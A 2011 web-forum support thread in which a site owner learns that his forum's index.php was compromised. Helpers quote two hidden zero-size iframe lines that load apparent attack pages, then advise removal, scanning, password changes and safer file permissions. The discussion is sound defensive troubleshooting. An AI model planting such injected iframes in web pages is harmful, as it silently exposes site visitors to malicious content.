this is odd?

blazinchuck · March 14, 2011, 11:10:38 AM

why would this be happening now? whenever i go to my site http://carolinadiesels.com it redirects me to the bottom of whatever page i choose? if i go the the portal...it takes me to the bottom, the forum...takes me to the bottom? never seen this happen before. im sure its not something ever one might be seeing...maybe just me? any thoughts, thanks,Chuck

NanoSector · March 14, 2011, 11:17:56 AM

I can see it too.

Does it happen on the default theme?
http://carolinadiesels.com/index.php?theme=1

Road Rash Jr. · March 14, 2011, 11:52:13 AM

I don't get redirected to the bottom but I did notice your logo at the top extends beyond the theme boarder to the right.

HunterP · March 14, 2011, 12:00:39 PM

I don't know what the meaning is of this code at the bottom of your page, but you should try to localize and remove it :

<iframe src="http://videoonlinefree.co.cc/hck" width="0" height="0" frameborder="0"></iframe>

kat · March 14, 2011, 03:24:39 PM

You might want to check the files on your site, too.

That line is screaming "HACKED!", to me.

NanoSector · March 14, 2011, 03:46:27 PM

Quote from: K@ on March 14, 2011, 03:24:39 PM
You might want to check the files on your site, too.

That line is screaming "HACKED!", to me.

It screams that to me too. Afraid of opening that link...

And you may like to use the kbscan.php utility.

busterone · March 14, 2011, 07:51:32 PM

Look for the iframe code in index.php. Then, yes, by all means scan with kbscan.php.
Are you running any other scripts besides SMF?

blazinchuck · March 14, 2011, 10:51:18 PM

where are yall seeing this code???

scripts? im running smf and thats it...i guess?

blazinchuck · March 14, 2011, 10:55:00 PM

ok, i looked at the page source and see the line code...not sure how it got there. where can i find this kbscan.php?

edit...I found the kb_scan...ran it(everything was good)...so I went in the index.php file and removed the line code. now im not redirected to the bottom of the page. go figure???

thanks guys. wish i knew how that code got placed there

busterone · March 14, 2011, 11:51:09 PM

It got there somehow.

If I were in your place, I would immediately change my host control panel login password, ftp password, and forum admin password. I would also watch it very close for a while. It is odd. If someone went to the trouble to hack your site, usually they do more than place one line with an iframe link. I did not follow the link, but I did find a few google results where others have had that same code show up on their site, but no mention of how malicious it may or not be. I took no chance myself though.

kat · March 15, 2011, 06:49:45 AM

Sure looks like a hack, to me...

http://www.google.co.uk/search?client=opera&rls=en-GB&q=http://videoonlinefree.co.cc/hck&sourceid=opera&ie=utf-8&oe=utf-8&channel=suggest

blazinchuck · March 16, 2011, 09:55:05 AM

if i just removed the other line code...does this mean another was replaced with it?? or is this a stock code?

<iframe src="http://bfe.org/board" width="0" height="0" frameborder="0"></iframe>

i will change all the PW's later today

funny thing is...i clicked the link posted earlier...and the one i just posted and they both went to the same site!!!!

I GUESS IT WAS A HACK!

"This web page at traffichistic.co.cc has been reported as an attack page and has been blocked based on your security preferences."

NanoSector · March 16, 2011, 11:22:38 AM

You surely need to reupload a fresh pair of SMF & mod (& possibly theme) files.

Then change passwords ASAP!

Arantor · March 16, 2011, 12:43:17 PM

Odds are the server is compromised, rather than your password being compromised.

blazinchuck · March 16, 2011, 01:01:11 PM

Quote from: Arantor on March 16, 2011, 12:43:17 PM
Odds are the server is compromised, rather than your password being compromised.

so should i upload my last full back up? i ran that kbscan and got nothing bad...

change all passwords, what needs to be done with the server...anything??

Arantor · March 16, 2011, 01:01:54 PM

Better still, what are the current file permissions?

blazinchuck · March 16, 2011, 01:05:20 PM

i guess whatever they were before 775,777,etc...is that what your asking?

i have no way of checking right now(at work)

Arantor · March 16, 2011, 01:06:39 PM

That's what I'm asking, at least... you see, if they're 777, it means that anyone else on the same server as you could have compromised your files...

blazinchuck · March 16, 2011, 01:11:54 PM

Quote from: Arantor on March 16, 2011, 01:06:39 PM
That's what I'm asking, at least... you see, if they're 777, it means that anyone else on the same server as you could have compromised your files...

any way to prevent that? i cant just change the permissions right....then site wont work right?thanks Arantor

Arantor · March 16, 2011, 01:52:13 PM

Sure you can change them, all it means is you can't install mods as easily.

News:

this is odd?

kat

kat